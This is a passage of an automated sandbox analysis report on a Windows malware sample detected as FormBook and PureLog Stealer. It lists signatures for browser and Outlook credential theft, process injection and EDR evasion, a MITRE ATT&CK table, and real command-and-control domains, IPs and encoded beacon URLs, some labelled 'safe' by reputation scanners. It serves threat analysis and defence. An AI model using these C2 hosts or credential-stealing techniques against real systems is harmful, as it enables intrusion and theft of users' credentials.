                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.MR-239-1599-A.scr.exe.7620000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1654874999.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1651899586.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		312
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		21
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  Abuse Elevation Control Mechanism                  		1
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop Protocol11
                  Archive Collected Data                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		41
                  Virtualization/Sandbox Evasion                  		Security Account Manager41
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares1
                  Data from Local System                  		4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture4
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Deobfuscate/Decode Files or Information                  		LSA Secrets2
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Abuse Elevation Control Mechanism                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                  Obfuscated Files or Information                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                  Software Packing                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1438436 Sample: MR-239-1599-A.scr.exe Startdate: 08/05/2024 Architecture: WINDOWS Score: 100 29 www.www60270.xyz 2->29 31 www.valentinaetommaso.it 2->31 33 21 other IPs or domains 2->33 43 Snort IDS alert for network traffic 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 51 5 other signatures 2->51 10 MR-239-1599-A.scr.exe 3 2->10         started        signatures3 49 Performs DNS queries to domains with low reputation 29->49 process4 process5 12 MR-239-1599-A.scr.exe 10->12         started        15 MR-239-1599-A.scr.exe 10->15         started        signatures6 63 Maps a DLL or memory area into another process 12->63 17 DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe 12->17 injected process7 signatures8 41 Found direct / indirect Syscall (likely to bypass EDR) 17->41 20 replace.exe 13 17->20         started        process9 signatures10 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 2 other signatures 20->59 23 DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe 20->23 injected 27 firefox.exe 20->27         started        process11 dnsIp12 35 www.fairmarty.top 203.161.46.103, 49761, 49762, 49763 VNPT-AS-VNVNPTCorpVN Malaysia 23->35 37 aprovapapafox.com 162.240.81.18, 49765, 49766, 49767 UNIFIEDLAYER-AS-1US United States 23->37 39 8 other IPs or domains 23->39 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  MR-239-1599-A.scr.exe50%ReversingLabsWin32.Trojan.Strictor

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.solesense.pro/aleu/0%Avira URL Cloudsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                  http://nginx.net/0%Avira URL Cloudsafe
                  http://www.fairmarty.top/aleu/?jn4lNb=1EzsQVnX0vVrGxBbRnBPuNOP8Hn1gSvJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpU5xNXvMTIPZOnLFq5OOndh66TdA/sgsdPCY=&jvudu=jXz4lVThP2GL4N0%Avira URL Cloudsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  https://x3nadr4oqr3b20ld.app0%Avira URL Cloudsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                  http://www.paydayloans3.shop/aleu/?jn4lNb=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&jvudu=jXz4lVThP2GL4N0%Avira URL Cloudsafe
                  https://www.valentinaetommaso.it/page-not-found-404/0%Avira URL Cloudsafe
                  http://www.paydayloans3.shop/aleu/0%Avira URL Cloudsafe
                  http://www.aprovapapafox.com/aleu/?jn4lNb=mEhw182mTcvL4X7VmCJbLa0KRk630JMb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5Fv1lORSZ/ddJgsC5cmTGFrP+D2MWmLQXjoE=&jvudu=jXz4lVThP2GL4N0%Avira URL Cloudsafe
                  http://www.colchondealquiler.com/aleu/0%Avira URL Cloudsafe
                  http://www.fairmarty.top/aleu/0%Avira URL Cloudsafe
                  http://www.colchondealquiler.com/aleu/?jn4lNb=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&jvudu=jXz4lVThP2GL4N0%Avira URL Cloudsafe
                  http://www.skibinscy-finanse.pl/aleu/?jn4lNb=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&jvudu=jXz4lVThP2GL4N0%Avira URL Cloudsafe
                  http://www.valentinaetommaso.it/aleu/?jn4lNb=qJYbYwaLgLDJAMSEQ5QgE4656+lZvARVMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjUavOuE9Ld2m4gF80zlDT2iLkYInMKGRZjmA=&jvudu=jXz4lVThP2GL4N0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                  http://www.83634.cn/aleu/?jn4lNb=/mfxaTJBOgt3JDZn0BatbUHTEszIrcd1tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEuNl9oe0KYtPyQihSGvBT9JqjuFq9ou3hQwM=&jvudu=jXz4lVThP2GL4N0%Avira URL Cloudsafe
                  http://www.83634.cn/aleu/0%Avira URL Cloudsafe
                  http://www.skibinscy-finanse.pl/aleu/0%Avira URL Cloudsafe
                  http://www.solesense.pro/aleu/?jn4lNb=Fsk+9Ugrf6MFs9mf9XEpMImSOUY5iiqQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUGzAeffoJWz8ACYHJmD8/KtCE1mdCsvc/NZo=&jvudu=jXz4lVThP2GL4N0%Avira URL Cloudsafe
                  http://www.valentinaetommaso.it/aleu/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  www.maxiwalls.com
                  		79.98.25.1
                  		truetrue
                    		unknown
                    www.skibinscy-finanse.pl
                    		178.211.137.59
                    		truetrue
                      		unknown
                      www.paydayloans3.shop
                      		64.190.62.22
                      		truetrue
                        		unknown
                        aprovapapafox.com
                        		162.240.81.18
                        		truetrue
                          		unknown
                          parkingpage.namecheap.com
                          		91.195.240.19
                          		truefalse
                            		high
                            vf3ba6qx.as22566.com
                            		103.93.125.69
                            		truetrue
                              		unknown
                              lb.webnode.io
                              		3.73.27.108
                              		truetrue
                                		unknown
                                fix01.pfw.djamxtvyk.cloudland3.com
                                		13.94.60.40
                                		truefalse
                                  		unknown
                                  www.colchondealquiler.com
                                  		217.76.128.34
                                  		truetrue
                                    		unknown
                                    www.fairmarty.top
                                    		203.161.46.103
                                    		truetrue
                                      		unknown
                                      www.theertyuiergthjk.homes
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.choosejungmann.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.toyzonetshirts.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.83634.cn
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.aprovapapafox.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.www60270.xyz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.avoshield.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.polhi.lol
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.valentinaetommaso.it
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.onitsuka-ksa.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.solesense.pro
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.solesense.pro/aleu/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fairmarty.top/aleu/?jn4lNb=1EzsQVnX0vVrGxBbRnBPuNOP8Hn1gSvJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpU5xNXvMTIPZOnLFq5OOndh66TdA/sgsdPCY=&jvudu=jXz4lVThP2GL4Ntrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.paydayloans3.shop/aleu/?jn4lNb=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&jvudu=jXz4lVThP2GL4Ntrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.aprovapapafox.com/aleu/?jn4lNb=mEhw182mTcvL4X7VmCJbLa0KRk630JMb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5Fv1lORSZ/ddJgsC5cmTGFrP+D2MWmLQXjoE=&jvudu=jXz4lVThP2GL4Ntrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.paydayloans3.shop/aleu/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.colchondealquiler.com/aleu/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fairmarty.top/aleu/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.colchondealquiler.com/aleu/?jn4lNb=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&jvudu=jXz4lVThP2GL4Ntrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.skibinscy-finanse.pl/aleu/?jn4lNb=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&jvudu=jXz4lVThP2GL4Ntrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.valentinaetommaso.it/aleu/?jn4lNb=qJYbYwaLgLDJAMSEQ5QgE4656+lZvARVMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjUavOuE9Ld2m4gF80zlDT2iLkYInMKGRZjmA=&jvudu=jXz4lVThP2GL4Ntrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.83634.cn/aleu/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.83634.cn/aleu/?jn4lNb=/mfxaTJBOgt3JDZn0BatbUHTEszIrcd1tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEuNl9oe0KYtPyQihSGvBT9JqjuFq9ou3hQwM=&jvudu=jXz4lVThP2GL4Ntrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.solesense.pro/aleu/?jn4lNb=Fsk+9Ugrf6MFs9mf9XEpMImSOUY5iiqQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUGzAeffoJWz8ACYHJmD8/KtCE1mdCsvc/NZo=&jvudu=jXz4lVThP2GL4Ntrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.skibinscy-finanse.pl/aleu/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.valentinaetommaso.it/aleu/true
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabreplace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://assets.iv.lt/header.htmlreplace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ogp.me/ns#replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.jsreplace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designersMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.iv.lt/domenai/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.sajatypeworks.comMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.founder.com.cn/cn/cTheMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://nginx.net/replace.exe, 00000006.00000002.4094316967.0000000004C16000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003A66000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://fedoraproject.org/replace.exe, 00000006.00000002.4094316967.0000000004C16000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003A66000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signaturereplace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=smsreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutionsreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://assets.iv.lt/images/thumbnail.pngfirefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.iv.lt/duomenu-centras/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.galapagosdesign.com/DPleaseMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordpreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.urwpp.deDPleaseMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://www.iv.lt/profesionalus-hostingas/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.zhongyicts.com.cnMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominioreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.valentinaetommaso.it/page-not-found-404/DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://x3nadr4oqr3b20ld.appreplace.exe, 00000006.00000002.4094316967.000000000443C000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.000000000328C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://assets.iv.lt/footer.htmlreplace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vpsreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://d1di2lzuh97fh2.cloudfront.netreplace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.iv.lt/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://d1di2lzuh97fh2.cloudfront.net/files/0u/0ua/0ua55l.js?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.carterandcone.comlMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
